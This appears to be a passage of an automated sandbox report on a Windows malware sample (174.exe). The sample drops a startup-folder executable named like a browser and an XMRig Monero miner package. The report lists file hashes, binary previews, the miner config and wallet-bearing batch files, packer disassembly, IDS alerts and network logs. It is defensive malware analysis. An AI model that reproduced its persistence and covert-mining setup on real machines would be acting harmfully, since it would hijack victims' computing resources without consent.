SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4gfzxjv.uqs.psm1

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4iyul4z.mba.ps1

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjbj2pv4.zkb.ps1

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Download File

Process:	C:\Users\user\Desktop\174.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.375702856183609
Encrypted:	false
SSDEEP:	192:VFLcbr8jR6T4YiZ/T0YmYV526Yu3hSWrJ4aadrq8uSF3:VFLcBT4YitT0Ymeo633hLrJ4JUSF
MD5:	AE96B1FB65498CDF458A52BC197466A5
SHA1:	C55F2E200B34D90CADDB261B971972C97648402F
SHA-256:	7D54679530CEC59EF4C71F059C3B6DA8F654E2A316FA4689319DB0AB35572880
SHA-512:	DE89B24BED221BEAA0CB74E3CE0EC97570FE21130F35C3683540A8BC76AFC10797898F410ACEF94D57B1CBEBBD06F0E820EEB1DF7D63FCDF45F7D907F6BC8C97
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....zg.............................7... ...@....@.. ....................................@.................................h7..S....@..`....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`.......2..............@..B.................7......H.......<)..,...........8$...............................................0..v.......(....o....(....-.(.......(....&..(......r...po..............s......r...p....r!..p....o........,...o.....(..........i.Yo..........o..... ....o....o.....+..o......(.......i.1.r7..prO..p.(....rW..p.(...........+<.........o....ra..p( ...,..(!......o........("...(!......X.......i2...&....r...p(........-.....B....=..(....o....(....-.(.........(....&..o#...(!... 0u..($...........(....C..\........!.

C:\Users\user\Downloads\xmrig.zip

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	2666251
Entropy (8bit):	7.996404011886235
Encrypted:	true
SSDEEP:	49152:u19rSOVxxqtG2008UtSAAL1B36NIldoRV04kjz7NZDT9AQJaMLPkXc0+OHd8HXK/:iASg6UEAEB3JldaV05z7TT9taUk0sCHQ
MD5:	57B7AB5BCE7D5E47FD168E1F0D437D32
SHA1:	050EEAE3E0F0E876F9DA175347B586871D14FE83
SHA-256:	1D903D39C7E4E1706C32C44721D6A6C851AA8C4C10DF1479478EE93CD67301BC
SHA-512:	8CC6E3E0E78F706172A47BEF261E1D73CE882CE531FE51177BA46CEE659128E2115311D348CA07A717FF737E4BC802C7CA4CC57DE716CBE55202B9482B5E2022
Malicious:	false
Preview:	PK........1ucY................xmrig-6.22.2/PK.........ucY=...=...=.......xmrig-6.22.2/benchmark_10M.cmd@echo off.cd /d "%~dp0".xmrig.exe --bench=10M --submit.pause.PK.........ucY....<...<.......xmrig-6.22.2/benchmark_1M.cmd@echo off.cd /d "%~dp0".xmrig.exe --bench=1M --submit.pause.PK.........ucYP.V............xmrig-6.22.2/config.json.V.k.0.~._Q.\eIJ;.[.}....c......_;.n...>...V...@..;...tw.........r...D..u%....jh...P......{...........@.q>.....d......."8=2.....f.zL..y..7[y....o...b.u.\|]...^.4...^x9XO.s.6......ocPo.C@.<...;N.V,...]B7..=..P.....iR.t.`..q..K.....0</Z.....V...,..w...c?.O..+..pt.!.cD.2.e......(...l./.!w....t...sj...0z..r..w.@...x.z.....s..9.1-i GJh&....D.....q&.l..k....\....Z./:....I.1........lwX.`+!..+.....[.s..ABY.Q.@.:.T.Hul&.\|.Q$..7..:\|...k..~....r....iq......2t..\t.....0.....Kpe...^#Z...>......r?..H.[.H.B....Z...._...B.r...r..Z....L.F...{.5O..:....PQ..iw.!H_.4.+1.:0.V.T.9X..p.GV.u...Iwr.._....n......5n...%.;.T...h.n.......A....$..=r=...

C:\xmrig\xmrig-6.22.2\SHA256SUMS

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	748
Entropy (8bit):	4.687094484887319
Encrypted:	false
SSDEEP:	12:luxgnoy/wHIX+XhsYyc+ATPJT5RwR4CRIh7wOtf8CuuS0mzwcHYz4WI9:Kgnoy/qIORG+d5eRdOt1ud0y7WI9
MD5:	C7A209DEE0F5D1C6C3DD496BA22F78AB
SHA1:	1E56F76DDE40B12443C544BD9D0B9BA48960B0B0
SHA-256:	C83B38B121842A02FB910FE260C83CCED6AA90663C2A1626231FF5122850DEE8
SHA-512:	DF57851FFDB741270EB166481768B923ACBF2AA4BF97F18714048CD9CFFF9CBAAAA078C278C3E2057850AC77728423A2C9F701E0084BBF8F94BD7F56B11456DB
Malicious:	false
Preview:	11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 WinRing0x64.sys.235a64e3520b1c2c27763122b303f78aee8d7c083dfd9f1eb936cd5174383609 benchmark_10M.cmd.d7747e7a3c782009f4ceb6e9c106115876386853929563b509da5258e3968d15 benchmark_1M.cmd.2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec config.json.e73491065d86b1ad69229bb5d2019e08b947e11a2a57adf5c2d9a2b5d8f4acad pool_mine_example.cmd.810614290bdb14d2ddf10f65f8adc988a8272764f2a9e2c378e52fad162da344 rtm_ghostrider_example.cmd.33497c69c21fa96bbc96f1d7f09608e462f8ab22555364977c0bd35fef27bc29 solo_mine_example.cmd.8e70ef38fe14a2ee2848df3d6f7e260d1caf8cfc15de694d678b8af151d62333 start.cmd.d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1 *xmrig.exe.

C:\xmrig\xmrig-6.22.2\WinRing0x64.sys

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: 47SXvEQ.exe, Detection: malicious, Browse Filename: xmr new.exe, Detection: malicious, Browse Filename: eth.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: hiwA7Blv7C.exe, Detection: malicious, Browse Filename: 5fr5gthkjdg71.exe, Detection: malicious, Browse Filename: aAcx14Rjtw.exe, Detection: malicious, Browse Filename: SharcHack.exe, Detection: malicious, Browse Filename: 0Ty.png.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\xmrig\xmrig-6.22.2\benchmark_10M.cmd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.738457731772711
Encrypted:	false
SSDEEP:	3:mKDD3M/PKXD0dAyIgytoyrIJnn:h7dXD0frsoD
MD5:	5BE1C4CACB5AE37C43527E99A097DC7A
SHA1:	1B2F00FEFDE9D601764D5D26D5E0FB2B9F58074C
SHA-256:	235A64E3520B1C2C27763122B303F78AEE8D7C083DFD9F1EB936CD5174383609
SHA-512:	20A9E18BC397FE86514875AF4213A02A5831A27671370849F05C2F3BA048BC29FC41CA96F0CB1CC08AAFF27BBEBF637F30D2EE798CB80ED03080E8C7D8F2D9A1
Malicious:	false
Preview:	@echo off.cd /d "%~dp0".xmrig.exe --bench=10M --submit.pause.

C:\xmrig\xmrig-6.22.2\benchmark_1M.cmd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.7280729963885095
Encrypted:	false
SSDEEP:	3:mKDD3M/PKXD0dAyIgydsJnn:h7dXD0frZ
MD5:	CBA1927CF6959DC99ECBD0C553E4DB6F
SHA1:	7F2D59CFDF2B0550D22AC54D0B1FA5AC8F8B5F57
SHA-256:	D7747E7A3C782009F4CEB6E9C106115876386853929563B509DA5258E3968D15
SHA-512:	C78AB9B017153C497EF2D0F568ADE265AE9B60238EBDB36D8EF7ECC4D232CD90FD5FDC5B600BB26437466C7300E571B95B4FF92A7F024A981A02196A14D6E3F1
Malicious:	false
Preview:	@echo off.cd /d "%~dp0".xmrig.exe --bench=1M --submit.pause.

C:\xmrig\xmrig-6.22.2\config.json

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3435
Entropy (8bit):	4.0435229723591455
Encrypted:	false
SSDEEP:	48:CtWTHcfLWHW8b9b2lZ9lCfnT1L8njzLn9ocyWokkX7yWokk/w4KD5r:CtWTGyHpT1L8njzLHWDp
MD5:	098F463E92B096A1D7C5CD4AD0322DD7
SHA1:	8D17348EA2A2CCDFE209C831C4CBAAE34FD83D68
SHA-256:	12CD851F0ABE192DEAC7F4FF0A939F6C65D076BD0265FC416E81AC210BF55DFB
SHA-512:	D17860E33CB5650E4EBC374CED09D4F97C3075D09A80FD462DEBCC090DCB0013AD8087795E0629BC8DF84B40343BC2484A0C629BDCB57A899C177DE88F4BB444
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\xmrig\xmrig-6.22.2\config.json, Author: Joe Security
Preview:	{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "asm": true,. "argon2-impl": null,. "argon2": [0, 1],. "cn": [. [1, 0],. [1, 1]. ],. "cn-heavy": [. [1, 0],. [1, 1]. ],. "cn-lite": [.

C:\xmrig\xmrig-6.22.2\pool_mine_example.cmd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1023
Entropy (8bit):	4.944208285706554
Encrypted:	false
SSDEEP:	24:knECAL1ACWm4Vw5fP5t59XMaoGaK8IZAR0x+FcU71Mtzkz7CQhvvFIVV+XD/Ve:8ErG58pPS5GapIWG+Fcc1Vz7LhvvMVwM
MD5:	2E737F5C3AF9C8AA5216DFDC5BE02CC6
SHA1:	05FE2040AEA6F6CFF25DEAF5CA2CA6793FAA64C7
SHA-256:	E73491065D86B1AD69229BB5D2019E08B947E11A2A57ADF5C2D9A2B5D8F4ACAD
SHA-512:	CE0E12A544623458F5905EA20F2B6F0E75CFB57ADD912290FBF2611EDDBE98DE7FFED3C9E650747967B2620E5EBBE33E249CBD60E7032BDB10C909CC516709CA
Malicious:	false
Preview:	:: Example batch file for mining Monero at a pool.::.:: Format:.::.xmrig.exe -o <pool address>:<pool port> -u <pool username/wallet> -p <pool password>.::.:: Fields:.::.pool address..The host name of the pool stratum or its IP address, for example pool.hashvault.pro.::.pool port ..The port of the pool's stratum to connect to, for example 3333. Check your pool's getting started page..::.pool username/wallet .For most pools, this is the wallet address you want to mine to. Some pools require a username.::.pool password ..For most pools this can be just 'x'. For pools using usernames, you may need to provide a password as configured on the pool..::.:: List of Monero mining pools:.::.https://miningpoolstats.stream/monero.::.:: Choose pools outside of top 5 to help Monero network be more decentralized!.:: Smaller pools also often have smaller fees/payout limits...cd /d "%~dp0".xmrig.exe -o xmrpool.eu:3333 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdU

C:\xmrig\xmrig-6.22.2\rtm_ghostrider_example.cmd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1220
Entropy (8bit):	4.575573022986975
Encrypted:	false
SSDEEP:	24:knTXzrL1ACvs4VYt5ONwvoGsPZAR0x+FcVtUtzH37CQhvvPI5E9c6I5E/Ywke:8T3G4HWPnwGsPWG+FcVK7LhvvPOMOoNt
MD5:	3F0155ABE745BE1F6089EAFC4F517AC8
SHA1:	277F510CEB62B277B141D094C82EEDEBDC6F3A35
SHA-256:	810614290BDB14D2DDF10F65F8ADC988A8272764F2A9E2C378E52FAD162DA344
SHA-512:	8DEF46852A962FF5DBED94E01F8D23019EF401A718D9C5A440D12B2FFA369539BE328F165F68CCC2098CD5E5C939BCB5F784F877BDD7B9D939393BBD2229D19E
Malicious:	false
Preview:	:: Example batch file for mining Raptoreum at a pool.::.:: Format:.:: xmrig.exe -a gr -o <pool address>:<pool port> -u <pool username/wallet> -p <pool password>.::.:: Fields:.:: pool address The host name of the pool stratum or its IP address, for example raptoreumemporium.com.:: pool port The port of the pool's stratum to connect to, for example 3333. Check your pool's getting started page..:: pool username/wallet For most pools, this is the wallet address you want to mine to. Some pools require a username.:: pool password For most pools this can be just 'x'. For pools using usernames, you may need to provide a password as configured on the pool..::.:: List of Raptoreum mining pools:.:: https://miningpoolstats.stream/raptoreum.::.:: Choose pools outside of top 5 to help Raptoreum network be more decentralized!.:: Smaller pools also often have smaller fees/payout limits...cd /d "%~dp0".:: Use this command line to conne

C:\xmrig\xmrig-6.22.2\solo_mine_example.cmd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	821
Entropy (8bit):	5.147610259279037
Encrypted:	false
SSDEEP:	24:knTC6jGoTcC6gaO8oAZvfa6Tz7nR7O+ORxAIHnV+XD/X:8TdNAzOr0a6Tz7nR7OhzVwX
MD5:	090703E56F46330ED625AC4363C9D25C
SHA1:	6CE0B265E0860F1913F4BB37A17AA7EDA88641C5
SHA-256:	33497C69C21FA96BBC96F1D7F09608E462F8AB22555364977C0BD35FEF27BC29
SHA-512:	1CD8C43287508C9393300D5A22C565D2F4BD98493A203112FD727518A4E439EB74035D18FE1F52E2D3594305A841CA93FCD0E3C61634F0992CFD3FC253872F19
Malicious:	false
Preview:	:: Example batch file for mining Monero solo.::.:: Format:.::.xmrig.exe -o <node address>:<node port> -a rx/0 -u <wallet address> --daemon.::.:: Fields:.::.node address..The host name of your monerod node or its IP address. It can also be a public node with RPC enabled, for example node.xmr.to.::.node port ..The RPC port of your monerod node to connect to, usually 18081..::.wallet address..Check your Monero CLI or GUI wallet to see your wallet's address..::.:: Mining solo is the best way to help Monero network be more decentralized!.:: But you will only get a payout when you find a block which can take more than a year for a single low-end PC...cd /d "%~dp0".xmrig.exe -o YOUR_NODE_IP:18081 -a rx/0 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD --daemon.pause.

C:\xmrig\xmrig-6.22.2\start.cmd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.42511855035714
Encrypted:	false
SSDEEP:	3:mKDDVBF//IyXQdAoWQIv:hyEQzIv
MD5:	EAF3A00CC0465F8AF471B849ADA29843
SHA1:	3042E97874706189AA9704D77C9E74A94E519106
SHA-256:	8E70EF38FE14A2EE2848DF3D6F7E260D1CAF8CFC15DE694D678B8AF151D62333
SHA-512:	56B9F3991AE4BAD5E06097D095931E746E6B2AC955649A5C793D9F4F6861C6FFC9316B063C34D7A8079AF201354C87BF3008BC0FD4321E59B27E1D8120B078CF
Malicious:	false
Preview:	@echo off..cd /d "%~dp0"..xmrig.exe..pause..

C:\xmrig\xmrig-6.22.2\xmrig.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6412800
Entropy (8bit):	6.624511627494028
Encrypted:	false
SSDEEP:	98304:JtRK2Xvf49fuI0nBkLuFvJr4XGCkc/zF2fz5IZ4ePzpS+KdbjrD/6K+TU3nA:I2Xv42VKzYz6Z4qSndf3D+TU3A
MD5:	F6D520AE125F03056C4646C508218D16
SHA1:	F65E63D14DD57EADB262DEAA2B1A8A965A2A962C
SHA-256:	D2FCF28897DDC2137141D838B734664FF7592E03FCD467A433A51CB4976B4FB1
SHA-512:	D1EC3DA141CE504993A0CBF8EA4B719FFA40A2BE4941C18FFC64EC3F71435F7BDDADDA6032EC0AE6CADA66226EE39A2012079ED318DF389C7C6584AD3E1C334D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........{S.N.=.N.=.N.=..b>.B.=..b8..=..o9.].=..o>.D.=..o8...=..b9.W.=.o9.\.=.N.<...=..b<.Y.=...9.n.=.o4.G.=.o>.M.=.o..O.=.N...O.=.o?.O.=.RichN.=.........................PE..d...))'g.........."......VB..rI.......>........@.............................0............`.................................................T.\..........Y...................p........Y.......................Y.(.....Y.8............pB.p............................text...8TB......VB................. ..`.rdata..nw...pB..x...ZB.............@..@.data.....*...\.......\.............@....pdata................].............@..@_RANDOMXV.............`.............@..`_TEXT_CN.&.......(....`.............@..`_TEXT_CN..............`.............@..`_RDATA................`.............@..@.rsrc....Y.......Z....`.............@..@.reloc.......p.......$a.............@..B........................................

Static File Info

General

File type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.368075780083029
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	174.exe
File size:	607 bytes
MD5:	594579e1df54a1b06ffabc55fea0b376
SHA1:	8638c9d3cbb31de291acd3f4ab2d859dc6615b23
SHA256:	8975061562d23fe044b62d89324687e6f03203062c6c026797795df247f4be30
SHA512:	9e80e2fb833d489e56ca46f3458c4a8355bedad44dc747c22096c5c622ad3e7ab4bfb77c373348b4da3c56d0f9d0a6c762f7b41d9d11a5ba8ea52141c21a9554
SSDEEP:	12:6zsqUabPEa5iGmAHypcPtJMyUdNDYR5uS9bMh/LtMEH67:6wLq78AHocPtJMrdNDYRES9whjzY
TLSH:	7DF0624509AE3088C499EA7046C5A7006A88682A31C204F69DCA4C782782897C8846D6
File Content Preview:	MZ23PE..L.....-..@...E.,......`....2.ukNO1..d.....r.u..Z..@.............y.....P=.....w..0...Z\|......S...B.j.X1...Wj.Yj.=....j...eu\..`..1...t$(N..au.@B..r.........F9........V$=....t..F ....aK..r.u.[f..".......Z9.r..).).....G.. W....[.[.-BE.[L.........e%F.

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x400064
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE
DLL Characteristics:
Time Stamp:	0xE22DA30F [Fri Mar 31 11:07:59 2090 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	49153
OS Version Minor:	49285
File Version Major:	49153
File Version Minor:	49285
Subsystem Version Major:	49153
Subsystem Version Minor:	49285
Import Hash:

Entrypoint Preview

Instruction
push ebx
mov edi, 00420000h
push 00000001h
pop eax
xor ebp, ebp
add esi, esi
push edi
push 00000008h
pop ecx
push 00000004h
cmp eax, 00000000h
push 00000005h
mov edx, 5C7565DFh
mov bl, 1Fh
pushad
add al, 00h
xor eax, eax
cdq
mov esi, dword ptr [esp+28h]
dec esi
jmp 00007FE0C125B0AEh
popad
jne 00007FE0C125B130h
inc eax
inc edx
ror byte ptr [esi], cl
jc 00007FE0C125B126h
shr edx, 1
jmp 00007FE0C125B124h
shr eax, 1
rol byte ptr [esi], cl
inc esi
cmp edi, esi
jnle 00007FE0C125B10Ah
mov cl, 04h
mov esi, esp
add dword ptr [esi+24h], edx
cmp eax, 00000000h
je 00007FE0C125B127h
add dword ptr [esi+20h], eax
test edx, edx
loope 00007FE0C125B111h
popad
dec ebx
add edx, edx
jc 00007FE0C125B0E4h
jne 00007FE0C125B11Bh
pop ebx
cmp di, 0222h
jmp 00007FE0C125B0B1h
mul edx
div ebx
pop edx
cmp esi, eax
jc 00007FE0C125B127h
xchg eax, edx
sub esi, edx
sub eax, edx
rcl byte ptr [edi], 1
loop 00007FE0C125B0B8h
inc edi
jmp 00007FE0C125B0B2h
and byte ptr [edi-5Fh], dl
test eax, 8D5BB205h
pop ebx
shr byte ptr [5BB54542h], 0000004Ch
jecxz 00007FE0C125B131h
cli
or al, 09h
adc ebx, dword ptr [ebx+25659E1Ch]
inc esi

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T11:40:59.072936+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49730	23.27.51.244	80	TCP
2025-01-08T11:41:03.007566+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49731	140.82.121.3	443	TCP
2025-01-08T11:41:03.663052+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49732	185.199.109.133	443	TCP
2025-01-08T11:41:07.176947+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49733	104.21.95.99	443	TCP
2025-01-08T11:41:08.321577+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49734	206.189.156.69	80	TCP
2025-01-08T11:41:09.408405+0100	2047928	ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)	2	192.168.2.4	51606	1.1.1.1	53	UDP
2025-01-08T11:41:10.406010+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49736	140.82.121.3	443	TCP
2025-01-08T11:41:11.006027+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49737	185.199.109.133	443	TCP
2025-01-08T11:41:13.896682+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49739	104.21.95.99	443	TCP
2025-01-08T11:41:14.977817+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49741	206.189.156.69	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 11:40:58.601512909 CET	49730	80	192.168.2.4	23.27.51.244
Jan 8, 2025 11:40:58.607952118 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:58.608030081 CET	49730	80	192.168.2.4	23.27.51.244
Jan 8, 2025 11:40:58.608191967 CET	49730	80	192.168.2.4	23.27.51.244
Jan 8, 2025 11:40:58.614228010 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072829962 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072846889 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072859049 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072874069 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072886944 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072899103 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072915077 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072927952 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072936058 CET	49730	80	192.168.2.4	23.27.51.244
Jan 8, 2025 11:40:59.072941065 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072953939 CET	80	49730	23.27.51.244	192.168.2.4
Jan 8, 2025 11:40:59.072958946 CET	49730	80	192.168.2.4	23.27.51.244
Jan 8, 2025 11:40:59.072966099 CET	49730	80	192.168.2.4	23.27.51.244
Jan 8, 2025 11:40:59.072989941 CET	49730	80	192.168.2.4	23.27.51.244
Jan 8, 2025 11:40:59.078102112 CET	80	49730	23.27.51.244	192.168.2.4
